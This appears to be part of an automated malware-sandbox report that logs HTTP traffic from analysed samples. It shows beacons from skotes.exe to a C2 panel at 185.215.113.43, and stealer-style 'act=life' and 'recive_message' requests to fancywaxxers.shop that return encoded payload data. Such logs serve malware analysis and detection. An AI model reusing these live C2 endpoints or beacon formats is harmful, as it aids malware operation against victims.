                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:50:03.455797911 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:03 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              26192.168.2.650021185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:05.095500946 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:50:05.803459883 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:05 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              27192.168.2.650022185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:07.328083038 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:50:08.025239944 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:07 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              28192.168.2.650023185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:09.679383993 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:50:10.413489103 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:10 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              29192.168.2.650024185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:11.937598944 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:50:12.654110909 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:12 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              30192.168.2.650025185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:14.280780077 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              31192.168.2.650026185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:15.867229939 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:50:17.101953983 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:16 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              32192.168.2.650027185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:18.735858917 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:50:19.435967922 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:19 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              33192.168.2.650028185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:20.952583075 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:50:23.037642956 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:22 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              34192.168.2.650029185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:24.671529055 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:50:26.071680069 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:25 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0
                                                                                                              Dec 31, 2024 09:50:26.071702003 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:25 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0
                                                                                                              Dec 31, 2024 09:50:26.071734905 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:25 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              35192.168.2.650030185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:27.598668098 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:50:28.307413101 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:28 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              36192.168.2.650031185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:29.942589045 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:50:30.632594109 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:50:30 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.649712104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:28 UTC264OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: fancywaxxers.shop
                                                                                                              2024-12-31 08:48:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-31 08:48:29 UTC1127INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:29 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=h77t2v2v2et4bo7ea6ilr4g676; expires=Sat, 26 Apr 2025 02:35:08 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2Bl3YjFBaxeXchfgG7tsSjzaduhZS58TUtWHD2Ah%2FABYeEmPhjfSE2luHLpkQW5s9ZysMpedPMPkPaEUdMJR7X3rJqcMfke93kW7J7izdhtSEQQo3xpywY9IELJlewQG9eed1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa902c3dc1c727b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2018&rtt_var=792&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1352477&cwnd=232&unsent_bytes=0&cid=8c36169329133b6a&ts=866&x=0"
                                                                                                              2024-12-31 08:48:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-31 08:48:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649713104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:29 UTC265OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 47
                                                                                                              Host: fancywaxxers.shop
                                                                                                              2024-12-31 08:48:29 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                              2024-12-31 08:48:30 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:30 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=k2mdqh2jae0pqchofb568h2srs; expires=Sat, 26 Apr 2025 02:35:08 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bac1gEOHQL6OUCHW%2BtfizaRUJ2uOs9E%2B2JPuRP5iFtguJupdIWXo9%2FyujbdTpyDvmJ10bQzbQ5edxnk%2FYP5QB7HmiBXr65HAZScYu0z1jMpEPofMH6zgNpNCdWslFPe79F6w3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa902c9d929727b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1964&rtt_var=753&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1438423&cwnd=232&unsent_bytes=0&cid=69acaa605e356577&ts=504&x=0"
                                                                                                              2024-12-31 08:48:30 UTC238INData Raw: 31 63 61 65 0d 0a 69 5a 44 7a 41 4b 49 77 4b 63 62 43 6e 2b 7a 49 77 64 44 44 4b 71 4d 6c 6b 75 45 72 6b 57 61 30 6a 6a 63 6d 52 71 41 5a 68 54 50 79 73 6f 55 69 6d 41 51 46 35 4c 48 36 7a 76 4b 31 6f 72 5a 50 6a 77 66 7a 68 51 6d 72 41 4e 58 69 52 45 4e 71 67 6d 2f 6f 45 62 50 32 6b 6d 7a 52 56 51 58 6b 70 2b 66 4f 38 70 71 72 34 55 2f 4e 42 36 6a 44 54 76 73 45 31 65 4a 56 52 79 33 50 61 65 6c 51 34 66 79 55 61 4d 64 54 54 61 65 75 38 6f 6d 74 70 4c 47 70 52 4d 70 49 2b 6f 77 4a 76 55 54 52 39 42 55 63 5a 4f 31 38 38 56 4c 45 38 59 42 72 67 45 30 46 76 65 44 36 67 75 72 37 38 71 4a 50 77 55 6e 30 68 55 44 35 44 74 7a 71 56 45 49 73 30 48 44 6a 57 2b 48 79 6c 32 6e 4e 57 6c 6d 71 70 50 57 43 71 36 36 78
                                                                                                              Data Ascii: 1caeiZDzAKIwKcbCn+zIwdDDKqMlkuErkWa0jjcmRqAZhTPysoUimAQF5LH6zvK1orZPjwfzhQmrANXiRENqgm/oEbP2kmzRVQXkp+fO8pqr4U/NB6jDTvsE1eJVRy3PaelQ4fyUaMdTTaeu8omtpLGpRMpI+owJvUTR9BUcZO188VLE8YBrgE0FveD6gur78qJPwUn0hUD5DtzqVEIs0HDjW+Hyl2nNWlmqpPWCq66x
                                                                                                              2024-12-31 08:48:30 UTC1369INData Raw: 34 51 61 42 51 4f 6a 44 45 62 4e 58 35 4f 39 45 56 54 48 50 61 2b 45 52 39 4c 79 49 49 73 64 65 43 2f 7a 67 39 59 4b 6b 70 72 47 75 54 38 42 48 34 6f 78 4a 38 41 7a 65 36 46 39 4c 4b 38 31 31 37 56 62 6a 2b 35 5a 74 78 31 70 4e 71 36 4f 39 77 4f 71 6b 71 75 45 51 67 57 66 67 67 45 72 6e 43 63 65 73 53 67 6f 39 67 6e 7a 72 45 62 4f 79 6c 32 7a 42 58 30 75 32 71 50 61 46 72 37 47 35 71 45 58 4d 52 2f 32 4a 52 76 41 45 30 65 5a 66 53 79 37 47 64 75 70 58 36 2f 4c 52 4c 49 42 56 55 2b 54 34 76 61 32 76 73 37 57 74 58 6f 4e 39 73 4a 77 48 36 6b 54 52 34 42 55 63 5a 4d 70 2b 35 46 4c 67 2f 5a 4a 71 79 30 42 4c 74 71 62 77 69 37 69 6c 74 36 39 43 77 6c 58 36 6a 55 2f 77 44 64 33 6c 55 45 4d 67 67 6a 57 6e 56 76 4f 79 79 53 4c 68 58 30 43 6f 71 75 71 4f 36 72 7a
                                                                                                              Data Ascii: 4QaBQOjDEbNX5O9EVTHPa+ER9LyIIsdeC/zg9YKkprGuT8BH4oxJ8Aze6F9LK8117Vbj+5Ztx1pNq6O9wOqkquEQgWfggErnCcesSgo9gnzrEbOyl2zBX0u2qPaFr7G5qEXMR/2JRvAE0eZfSy7GdupX6/LRLIBVU+T4va2vs7WtXoN9sJwH6kTR4BUcZMp+5FLg/ZJqy0BLtqbwi7ilt69CwlX6jU/wDd3lUEMggjWnVvOyySLhX0CoquqO6rz
                                                                                                              2024-12-31 08:48:30 UTC1369INData Raw: 56 58 38 69 55 2f 38 43 64 71 73 47 77 51 6a 32 6a 75 2f 45 63 48 78 68 57 48 4b 45 48 36 6e 72 76 4f 4a 76 4f 4f 74 37 31 47 42 51 50 7a 44 45 62 4d 4a 31 2b 52 54 56 69 76 50 65 4f 6c 66 35 50 65 65 61 73 42 53 52 71 47 6b 39 6f 57 70 72 72 61 7a 51 73 46 50 39 59 4a 44 2b 55 53 59 72 46 4a 63 5a 4a 6f 37 31 6b 62 67 73 4b 52 68 7a 6c 78 4d 73 75 44 69 77 4c 50 6a 74 61 30 49 6d 51 66 39 69 30 7a 32 43 39 66 6d 57 30 45 75 7a 6e 50 70 55 76 6e 39 6c 57 4c 4d 57 6b 47 70 72 76 6d 47 6f 36 69 35 70 30 6a 41 54 62 44 4e 43 66 51 63 6c 72 51 56 63 43 50 4f 64 75 67 54 33 76 47 66 62 4d 64 45 43 37 76 75 35 4d 36 74 72 2f 4c 35 43 4d 31 4f 38 49 68 44 39 77 54 52 34 56 42 48 49 38 46 32 34 46 76 6c 39 5a 56 75 79 56 39 4e 70 4b 66 35 69 37 69 6d 75 36 31 45
                                                                                                              Data Ascii: VX8iU/8CdqsGwQj2ju/EcHxhWHKEH6nrvOJvOOt71GBQPzDEbMJ1+RTVivPeOlf5PeeasBSRqGk9oWprrazQsFP9YJD+USYrFJcZJo71kbgsKRhzlxMsuDiwLPjta0ImQf9i0z2C9fmW0EuznPpUvn9lWLMWkGprvmGo6i5p0jATbDNCfQclrQVcCPOdugT3vGfbMdEC7vu5M6tr/L5CM1O8IhD9wTR4VBHI8F24Fvl9ZVuyV9NpKf5i7imu61E
